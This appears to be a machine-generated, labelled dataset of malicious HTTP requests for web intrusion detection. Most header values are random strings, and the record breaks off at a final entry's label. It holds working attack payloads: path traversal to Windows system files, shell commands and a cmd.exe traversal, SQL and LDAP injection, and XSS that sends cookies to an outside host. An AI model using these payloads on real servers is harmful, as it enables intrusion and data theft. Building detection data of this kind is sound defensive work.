UA-Pixels: 9202x764
Via: 2.1 www.meer.htm:6285, 4.4 www.ilut.tiff, 2.0 29.69.203.166
Transfer-Encoding: compress
Upgrade: bkt1c/0.9, a15/2.9, cEsxaa/0.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 019195237
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35284
Start - Id: 45727
class: PathTransversal
GET /ToeQXGRBYwtvPLH.cgi?prrEswhntuneeo=1%3A%5C%5CWINNT%5C%5Cwin.ini&3TaiGNl1mTeti=ee4stdin&ciYiei5TcgodT=stFisvt2nhoxtermols&9pzerirqstlhcp1=553&0.in0Lc5@pdT=%7Cm+ HTTP/1.1
Host: 104.226.139.252
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: omj-n;q=0.8, fra1-nlyz90s;q=0.5, ann-wtwedm;q=0.9, oo-tporifoa;q=0.5, nqtup-hwTtiolv
Cache-Control: no-store
Client-ip: 19.222.68.7
Cookie: oNn=tZiCeHhsdncg;st=31355;SBbmailZE06u=vd ez:dusrEaprocessing-instructionsf8qckwindow.openo;jDseiypsf=A<wp mas6rno'p2insertand;rdy0dpc=3329065
Cookie2: $Version="66"
Date: Sun, 26 Aug 07 20:39:04 UTC
ETag: W/"6TA0sUBIpgg4.xGcl"
Expect: rSosIh9e=a8hwy3h;f2oa3tw=ntAp
From: reani1tb@daeireeubl.de
If-Modified-Since: Tue, 28 Feb 06 15:23:55 CET
If-Unmodified-Since: Fri, 28 Dec 07 20:53:53 CET
If-Match: *
If-None-Match: "PDuDe4SZ2XeT@Fa8S"
If-Range: *
Max-Forwards: 81
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: http://www.obfsIrr.cz/egehu.php3
TE: chunked;q=0.2,trailers,trailers
Trailer: Expect
User-Agent: 0UVPBP6L6v http://www.Rith.net
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9995x4195
Via: 7.2 www.bnulth.jpeg, 5.4 www.Aae7ma.jpg
Transfer-Encoding: identity
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 1618317
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45727
Start - Id: 36725
class: OsCommanding
GET /akp-t/aiasHnatisEo/i@fLdIZE247xCbb/wDLjrO8phkZ/fyMXQ/rqrG/0olJz8D/taoizw8gaE6azjsu/stAieLNi2ttmediu8/iHAJ.shtml?vlesrsy=eijsgEqeIsbodls&telmHrxdfi=+++++%3B+echo++++++%3B+w+++++++%3B+++uname+++-a++++++++%3B+++++id&uEiceeat=8768111&bhttpGwdQdopenjT=03&szfizmeh=218539&6S4txe=itiioir%2BttdtmpEEs&vehteobERai9r=r&9a0a=ea1eD&Talla=eYAUvIfIvwg&oisuaa3eHtca0=ahptAe&cioldseont7ojm=6 HTTP/1.0
Host: www.iHe0amHsno.net:4608
Connection: close
Accept: text/*;q=0.7, application/*, text/xml;q=0.3
Accept-Charset: iso-8859-5, x-mac-hebrew;q=0.9, euc-kr, euc-tw
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 136.206.104.170
Cookie: oiseeIod9=ptoe n4l@ATe7tolr;tge2tt2eioooce=h replace'>;eu3aaAteoe=mAhttpsO;s1ecGxre8xs=29544023;sE2ocdeqirUNol=27118;faamgnbwelre=0815
Cookie2: $Version="066"
Date: Fri, 11 Jun 04 13:56:24 UTC
ETag: "hdxb06ek3SSITXtEz"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 18 Nov 06 16:31:32 CET
If-Unmodified-Since: Mon, 27 Feb 06 12:26:08 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Aug 04 03:54:34 CET
Max-Forwards: 14
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic bVhudGVvbDplU3Rtc3I=
Authorization: stOa hhlo=wwtuscx0
Range: 61612-,28-09
Referer: http://bgie.net/otIly/ghms/pse3/imrla.fgf
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/9.9 (X11; U; Linux i386 8.3; ta-en; rv:7.9.5) Gecko/47313336
UA-CPU: Sparc
UA-OS: Win98
UA-Color: color16
UA-Pixels: 656x0255
Via: HTTP/6.8 www.E8st2.htm
Transfer-Encoding: uenvo
X-Forwarded-For: 18.24.168.27
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36725
Start - Id: 44849
class: PathTransversal
GET /eqocjQ/ncaoolrEdlxaneaonPad/lXYMDlO/@A-3wi5-Fjsx3t/tiQ6y6auSbTR4h/s5E4an/bUTJtMtq-j8BX/enEaLA/wz./tsrnretvpB5nc1t/tst69Ymz.jpeg?jotDAlesjs=doc%28+file%3A%2F%2F%2Fc%3A%2Fde%2Ftscfmeo.xml+%29 HTTP/1.1
Host: www.ospktpzi.fr
Connection: close
Accept: audio/*;q=0.7
Accept-Charset: x-mac-japanese;q=0.9, x-mac-japanese;q=0.8, iso-8859-1;q=0.3
Accept-Encoding: *
Accept-Language: 9ehoqe-noc;q=0.4, D3eyn-lJhu2n9;q=0.8
Cache-Control: max-stale=3
Client-ip: 95.241.148.239
Cookie: sdrqnhdrl=fiRny-ismspsrhf;n7wt=3;9tnaseksqDakbaS=6473561;tpimhe=(5eeanh)Httse;5v0=hhaOwnh;3dhlcittQslu=f es
Cookie2: $Version="94"
Date: Thu, 28 Jun 07 19:09:33 UTC
ETag: W/"eWSmgy4O4E8KbW15NvP"
Expect: 100-continue
From: hohEtsbm@c8e2atu1l.be
If-Modified-Since: Sat, 20 Jan 07 03:42:30 CET
If-Unmodified-Since: Mon, 02 Jul 07 16:23:38 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Apr 05 06:26:10 GMT
Max-Forwards: 5
MIME-Version: 3.5
Pragma: hhn=eizS
Proxy-Authorization: Basic MG5lZXNrc3Q6Zmtab3ZsczE=
Authorization: Basic ZWNoZWVjOmhnU3Jpbw==
Range: 776321-,6-
Referer: /iaes.png
TE: gzip;q=0.2,trailers
Trailer: From
User-Agent: yxCXst http://www.dNgeeaee.uk
UA-CPU: StrongARM
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: 4.2 www.aaev.htm
Transfer-Encoding: deflate
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 141 5.122.155.98 "97dso" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44849
Start - Id: 46917
class: XSS
PUT /yEWybCVMHXU/E3dnxatnw/hw@sRKRGsn@eP/J1CetcRot.html? HTTP/1.1
Content-Length: 239
Content-Language: suugi
Content-Encoding: identity
Content-Location: http://www.t7ex.fr/witoue/ehts/rrIswTEt/k0bgsfc/tU7ce.dll
Content-MD5: YXRoZW9vcjhvZHNsVnJuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sun, 25 Jan 04 14:56:32 UTC
Host: www.ehOs.de
Connection: 7opiiS
Accept: image/jpeg;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 67.18.221.141
Cookie: eIl9deea=enp;CtSPKSC=ahs-mm;vhAmny=5485759138;nisr4rioka1h=ds|tA
Cookie2: $Version="1"
Date: Wed, 31 Mar 10 14:11:02 CET
ETag: W/"GrP4IKP7N3PcZKc1rE"
Expect: 100-continue
From: nlqn@timuoEgjAR.ch
If-Modified-Since: Mon, 21 Feb 05 19:05:55 UTC
If-Unmodified-Since: Sat, 20 Jan 07 24:06:00 GMT
If-Match: "ifgnEX6zRgo.d-5uoS"
If-None-Match: "cP5SBg1GzHpSSVKEf2EL"
If-Range: Sat, 29 Apr 06 03:10:29 CET
Max-Forwards: 657
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM bnRtZmhxYWRkcmVxcmFmMDR4bHNvaDg0bDlvc3RldlUzbWFzMHJqcHIzc093
Range: -790
Referer: /rhaiut/8ozoYs.tar.gz
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.2 (compatible; MSIE 8.3; Linux i586; gbthiie; xf5hss)
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: 7.1 www.mRerr7t3.jpg, 4.0 177.44.101.16, HTTP/6.0 92.30.98.233
Transfer-Encoding: ianwb; 8tue=ay4t
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

im5Zbeceee8s=aofbhiafaiaotnro&htaccesperl1s2OallMobjectK=<style     type    =   "text/javascript"   >[document.location.replace('http://www.nili.com/cgi-bin/inat.cgi'+document.cookie);]</style  >

End - Id: 46917
Start - Id: 47843
class: XSS
GET /bKhtaccesQL3logmeEqAO.htm?rphenometavloeB=161719&0lHE1rImrszsnh=%3Cimg+dynsrc++%3D+++%22+++++javascript%3A+++%5Balert++%28%270ew7%27%29%3B%5D%22+%3E&PetmbnneoSivp4=feNEbK5q&eu2aQ=Q7copyl&tasOfHau=o&caf=014597&vtosybfilr=9bCoJ&9eotinr=%2F%24tnmdGdb&ttilcc=%7E2ta HTTP/1.1
Host: 246.247.254.155:80
Connection: Ie334h
Accept: text/*;q=0.6, application/*
Accept-Charset: iso-8859-2, shift_jis
Accept-Encoding: 
Accept-Language: Neihsu-wi, ty7tnsn9-e;q=0.0, suiute-0n;q=0.1
Cache-Control: no-transform
Client-ip: 38.125.73.120
Cookie: 8pta=ozoerc;eeiei=538850084;shutdownWiwindow.open=fdwis;isKc3SWhTrozr6=etmhs ovS&haa;oniHa=oc;nrhynarsueseil=b6orao9g
Cookie2: $Version="459"
Date: Mon, 01 Jan 07 17:35:05 GMT
ETag: W/"h.o9mDWvBmOAdKm@W"
Expect: er7hdEG=yegd6jr;z1nte=wyzEmd
From: rntaoh@dim7.fr
If-Modified-Since: Mon, 22 May 06 06:49:15 GMT
If-Unmodified-Since: Sat, 17 Apr 04 11:27:20 GMT
If-Match: "yumdA@uyDW-Z.RJC"
If-None-Match: *
If-Range: *
Max-Forwards: 0628
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZWhOM3V1eDplckx0bnM=
Authorization: Basic Z2JzbmQ6ZW51cjEw
Range: 035-1,0779-,77-
Referer: http://tahog.it/plhe.nsf
TE: chunked,trailers,chunked;q=0.2
Trailer: Pragma
User-Agent: tixdeni/3.7
UA-Disp: 5072,477,16
Via: g1h/7.2 144.115.175.48
Transfer-Encoding: identity
Upgrade: oeeepq/9.5
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 98.250.156.118
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47843
Start - Id: 44809
class: PathTransversal
GET /@lhN/nsnr2Oaiehe/esa/vDmrE..css?o7lbtcn=doc%28++file%3A%2F%2F%2Fc%3A%2Fi0eoe%2FdeytEve.xml++%29 HTTP/1.0
Host: www.aamWueteqp.fr
Connection: tect
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: RbelL-i, rn-eeT
Cache-Control: no-store
Client-ip: 162.199.90.42
Cookie: 2wEfRdaus9arjhe=ijmh3ec;ertntuQoEhy=aDtn nOpimg nUwO3anq<
Cookie2: $Version="8"
Date: Sun, 09 Mar 08 03:33:13 GMT
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 3wznn
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sun, 09 Mar 08 04:49:59 CET
If-Unmodified-Since: Fri, 14 Mar 08 05:34:17 UTC
If-Match: "m9_p-Ur4.R@L2dpPQdz"
If-None-Match: *
If-Range: Fri, 01 Oct 04 20:37:42 CET
Max-Forwards: 614
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVlYmloMTpvYWxyb2Yx
Authorization: ikho9 ta2z=kpen
Range: -970
Referer: http://www.sekreed.biz/eststi/d3gcr/goeso/ts9ss.htm
TE: chunked;q=0.0
Trailer: Pragma
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 2.3; pa-ed; rv:2.8.1) Gecko/26241058
UA-CPU: PowerPC
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 1.9 40.6.132.169, 1.9 217.103.58.181
Transfer-Encoding: gzip
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 20.26.247.44
X-Serial-Number: 40759970154914
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44809
Start - Id: 46827
class: XSS
POST /xruE-wQUOuS-kIOp/5ULZ4O-2p/myofsatsrtnEnnavm/uexecNwmeta0JGXPIvt/socieheOIsse.jpg? HTTP/1.0
Content-Length: 268
Content-Language: tntt
Content-Encoding: compress
Content-Location: /th7ub7/E87hfs/6riot/rXLeaId.tiff
Content-MD5: ZDNlbmNlZXNkZTN2bmxncw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Nov 07 15:31:41 CET
Last-Modified: Sat, 15 Dec 07 21:22:41 UTC
Host: 11.193.11.221:43571
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, deflate;q=0.9
Accept-Language: whe-clsrso;q=0.9
Cache-Control: only-if-cached
Client-ip: 169.136.109.14
Cookie: oRrArl5t7cd=ss;4SeElehrut=9Itx iekrRbr
Cookie2: $Version="28"
Date: Thu, 26 Mar 09 02:16:51 CET
ETag: W/"CE44HJExLHf9qTC"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Wed, 04 Jul 07 15:53:47 UTC
If-Unmodified-Since: Sun, 26 Oct 08 07:23:01 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7438
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: Digest cnonce="rw8aho"
Range: 04-141477,-19
Referer: /drot.asmx
TE: chunked;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/7.0 (Windows; U; Win98 9.6; E4-aM; rv:7.5.9) Gecko/31210603
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: FTP/6.8 www.metSrcu.png, ritte/6.7 182.1.169.83, 6.2 www.eaelnwg.css
Transfer-Encoding: identity
Upgrade: dmhn/6.6, j0orh/4.6
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 072274181665
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Eemssle=(7g&ttedi=sFstniptsWoErTxn&eoileLinn=b-h&apm=e&ItvddoiozbttaDs=nqUjWN5&tcq=txe&ktutlrphih9m=oajn&lnrltojor5t2s=86665&dmnt=<img+src=javascript:    alert  ('Si.AlcoTd')>&Qnke=hya&lsrcrgngiSNa7I=37&r3iangatAosTikn=077295&r04siwtead=t&fadh=39oi

End - Id: 46827
Start - Id: 37754
class: LdapInjection
GET /tASYT1yG2rs./oseO1aniu727e9/wp-ThuF7bEOW@/pItexPa5@PBR/eltmsnSci/alaznlistnonfehfnosv/snrmasnreee4/eh94vsuoeeieEI1is4l/e@NVdGC58JZY_8Vk1/taWMYkNTqv/O1fL9k1rCR@c.png?SpVssesmaz=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.g2Sq00.cz:53120
Connection: iaba2
Accept: audio/x-wav;q=0.5
Accept-Charset: windows-1252
Accept-Encoding: compress;q=0.7, compress;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 18.137.252.198
Cookie: nn2elo==dcsc;ilbtol=it;isnzx=<7&T%pelogtaLyryreplacea;ottn=chuagwideozaaidn
Cookie2: $Version="98"
Date: Thu, 23 Feb 06 24:18:27 CET
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: atsAq
From: Tnocerr@fsdzTjcit.de
If-Modified-Since: Tue, 12 Sep 06 04:22:45 CET
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: *
If-None-Match: "r0XA-A1E5jHQzyGng.d"
If-Range: *
Max-Forwards: 63
MIME-Version: 0.5
Pragma: no-cache
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 6-
Referer: /z4hc/0gn8/md6a/nhre/aq4rer.conf
TE: chunked
Trailer: Proxy-Authorization
User-Agent: h@yVBH9TkK http://www.lltr.fr
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 644x6409
Via: FTP/6.0 www.irtA4.js
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 49.81.169.152
X-Serial-Number: 4395839
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37754
Start - Id: 45631
class: PathTransversal
GET /m9Tee8PXr6grK57/bocut/ehzCO/ex730drCwVydzV/ssudhhe/nMmC.Oxpr/dcwieupnnhBdehi/hlIir3tvwfusUa3i/srOk5SstPgT1aylt.shtml?gmn1efr=92209594&AYt8=mk&tsiocraces5diht=sur003rakdeNkfv&ydxgnsddtt=hjcpsn&oahlna53nt=22809786&atOemr=z%3A%5Cwindows%5Cboot.ini HTTP/1.1
Host: www.r4sN6e8.biz:80
Connection: keep-alive
Accept: image/*
Accept-Charset: utf-7;q=0.4, windows-874, x-mac-ce
Accept-Encoding: identity;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 95.84.73.85
Cookie: bpneC4=s47jioUt;iwmWagn=79823;no=esloorr9;iisstyleER251iUK=rOvw.URSn;mto25ai=nef;oqr=85799
Cookie2: $Version="56"
Date: Wed, 21 Dec 05 06:39:39 GMT
ETag: W/"X2JKpknOV_ZB@K8FwCPm"
Expect: seoOtore
From: icafeu@elilysn5.com
If-Modified-Since: Fri, 24 Jul 09 18:18:18 UTC
If-Unmodified-Since: Thu, 02 Mar 06 21:42:54 CET
If-Match: "bAsTW383JDRa0PgbyVJ"
If-None-Match: "zT4wwZcMuLrhV21SKK"
If-Range: *
Max-Forwards: 18
MIME-Version: 2.8
Pragma: un='tdt0lmUh'
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: Basic b2pOYWVJdDplNzFv
Range: 41-9272,-212,7881-582
Referer: /dcOko.rar
TE: chunked;q=0.5,trailers
Trailer: Upgrade
User-Agent: trisrdI/2.0
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: 6d3/2.2 10.77.140.109
Transfer-Encoding: compress
Upgrade: tgmy/2.8, Ns4a2/6.2
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45631
Start - Id: 37513
class: LdapInjection
POST /zWZZQr/mPK6BPULV6F/dN1tont9sbeoiN/tanJMPBx/awawihtmeoR/yla/hsrwenseosuniosolR/e_UFnfUS/72YcU7noiIgEI-XU5/at/9h2.aspx? HTTP/1.0
Content-Length: 292
Content-Language: gnhi6Uui,0td,3hc
Content-Encoding: compress
Content-Location: http://www.nyeke.org/r4eieI/rfuninDh/6npynat/weslol0/siSuSte.jsp
Content-MD5: ZkVscnRhYXRxTDVnY0NzRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Jul 04 08:47:31 CET
Last-Modified: Fri, 20 Apr 07 20:09:18 CET
Host: www.hlsszruoaa.uk
Connection: GIu97
Accept: text/*;q=0.5, image/*;q=0.7
Accept-Charset: utf-8;q=0.1, windows-1250, x-mac-icelandic;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 243.13.167.199
Cookie: raDitltr=3455;2lr=muald;AelEta=661;geoosiysel=532372;admin.uTT2=Le e7i >eT7<mew
Cookie2: $Version="571"
Date: Tue, 19 May 09 07:50:39 CET
ETag: W/"sa0vFx7xhNJYWVp7t4"
From: t7in1r0e@I35dntt6be.fr
If-Modified-Since: Tue, 15 Aug 06 02:26:44 UTC
If-Unmodified-Since: Sat, 16 Jan 10 09:05:33 GMT
If-Match: "OSkvfGtAenBHvp1LP"
If-None-Match: *
If-Range: *
Max-Forwards: 62
MIME-Version: 0.6
Pragma: rU='6tge'
Proxy-Authorization: Digest username="htyrO"
Authorization: NTLM cnQ4bGVvaVN3b3JpaHJtY0hibklhWmx0ZWNoYm9KNHNoZGdvYmxyYQ==
Range: 0516-7855,069180-,334-
Referer: /nwoo/eUOtys/b2tos.tiff
TE: gzip;q=0.3
Trailer: Connection
User-Agent: p5FFB-nXwH http://www.dynexA.org
UA-CPU: 68000
UA-Pixels: 2665x9772
Via: HTTP/9.6 221.168.145.233
Transfer-Encoding: gzip
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569

wSdadetemnnPdl=Ol1e2&lmeiaaOhe1Mwleh=14430&apodCcal=lrhtife@hr &1XDrET=r5t9y&eaknhtd=enWMqv&i2qatoIuPeAhGns=9&tm9E1llwe=kTwsesdtjafo&fuu6inlideety=888219978&6ilE=s mprocessing-instructionss%a)na&ueie=ottta)(&(objectClass   =    o6*)&SXbbK=3&ew99rimaha=ntvar%lopa&Isge=1672

End - Id: 37513
Start - Id: 43236
class: OsCommanding
GET /boikt7gohtdasajb.asp?scriptaA0a=s%40Kt&ctta6ims=cHootrtesr&1niam=o%27sdm&woyocOeeEe=8148992&td=mail+ovnes%40vsatre.gl1c.gov%3C%3C+%2Ftmp%2Fwu.c+%3B&hihr=uvs8m2i&or=wwsne8ehoo8&u8A=oomenctUeil&altmD=lqzeerv%5D47tvkorps&nginlaaen=ttl7elinkI5wg93ahttpsani&tyGc6Rh4i5=8411&vRISj=thpVYJxN&eomm=cdpLsra&bhlkosu6audohEa=r1ne%3Fm HTTP/1.1
Host: 195.242.114.254
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp;q=0.1, koi8-r;q=0.8
Accept-Encoding: gzip;q=0.3, compress, gzip;q=0.4
Accept-Language: un-a7eme3t;q=0.9
Cache-Control: no-cache
Client-ip: 36.211.14.62
Cookie: netefh=tedsele;AEPQZ3a7b4SH=ogDfaAWX@;cmN9nlannohrr=e>;uih1nte=sa 3f06nm >ro pL\apositioninsert;j3o=417608;ooqax2r15llife=rd3ledpm\tn
Cookie2: $Version="5"
Date: Wed, 01 Oct 08 13:04:18 CET
ETag: "7vRs2CO.Rsi0wa-sA5q"
Expect: e87y4=Iztt;eiaz=serwoe
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Tue, 11 Mar 08 13:21:23 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Sep 07 08:34:25 CET
Max-Forwards: 84
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Digest uri=/abtstebu/h4felsd/o370lht/etxsert/rdgGE.asp
Authorization: xta4e coetilod=pcyr2o
Range: -330,06836-
Referer: http://www.Ieurn.biz/ifeafwiT/dwtst7r/gt2a/x8kelni/9on35hhd.pl
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 3.8; i6-yX; rv:6.9.4) Gecko/79256345
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 0.1 225.142.131.138
Transfer-Encoding: deflate
Upgrade: nbUlro/5.5, yfi/5.9, islxmt/9.6, tmL/9.7
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 173.145.188.232
X-Serial-Number: 3809752703652
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43236
Start - Id: 42032
class: SqlInjection
GET /e52quhrnbeetFieier/9enseqyfiwuh/rst2ez2qufn/dnTBepnvR/HF0kiYGH/oxsansndUjehaooOna/smtbaa/tmpyBv/Oanx7eA.htm?bA0iarHc=ait%27%2F**%2FUNION%2F**%2FSELECT%2F**%2FbaSIei%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Fkir%2F**%2Flike%2F**%2F%27%2525&lremsTH=65 HTTP/1.0
Host: www.bahttkv7.ch
Connection: nlhHrl
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: min-fresh=406
Client-ip: 144.52.64.113
Cookie: 5rvhqve=51175880;ltullm=030707
Cookie2: $Version="324"
Date: Tue, 29 Jan 08 05:07:11 GMT
ETag: "dwMlCadgRWtK@K1F_"
Expect: 100-continue
From: eliqs@octere.st
If-Modified-Since: Thu, 14 Dec 06 22:20:26 GMT
If-Unmodified-Since: Wed, 27 Feb 08 04:43:06 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Feb 04 22:41:06 UTC
Max-Forwards: 2
MIME-Version: 2.5
Pragma: cdoq='ulz90eh'
Proxy-Authorization: Basic ZWdvZTpuaGY0aG4=
Authorization: Digest nonce
Range: 4936-0,-6636
Referer: http://eNgGhqhi.cz/oUoo08/tihonA/mhenLyr/ooucilY.php3
TE: trailers
Trailer: From
User-Agent: Mozilla/8.4 (X11; U; Open BSD i386 1.6; ez-mr; rv:3.6.8) Gecko/07569545
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: 0.1 www.7ue5oeR.jpeg
Transfer-Encoding: msot; zwt2iob=igOehlSm
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 27908
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42032
Start - Id: 36568
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 216.18.104.151
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *;q=0.7
Cache-Control: min-fresh=4511
Client-ip: 117.70.6.179
Cookie: mochaorI54dvJf=a9h5n
Cookie2: $Version="139"
Date: Sun, 10 Sep 06 13:10:46 GMT
ETag: W/"g8bltgAKXO5Z5rPL@p"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Wed, 09 Apr 08 01:39:46 CET
If-Unmodified-Since: Sat, 06 Jun 09 15:46:16 GMT
If-Match: "f82VsZpd.HZDE.qc"
If-None-Match: *
If-Range: Wed, 06 Apr 05 08:40:52 GMT
Max-Forwards: 60
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: tcpfic reesTpr=hh3orhdh
Range: -961935,910376-
Referer: http://www.yeisfaul.it/iirt/en6qnc/ta8lIty.nsf
TE: trailers,gzip;q=0.4,gzip
Trailer: If-Match
User-Agent: Mozilla/2.0 (Machintosh; U; PPC Mac OS X 0.5; ne-iA; rv:7.6.1) Gecko/62703292
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: HTTP/2.9 186.100.131.110
Transfer-Encoding: deflate
Upgrade: iOe8/3.1
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36568
Start - Id: 48000
class: XSS
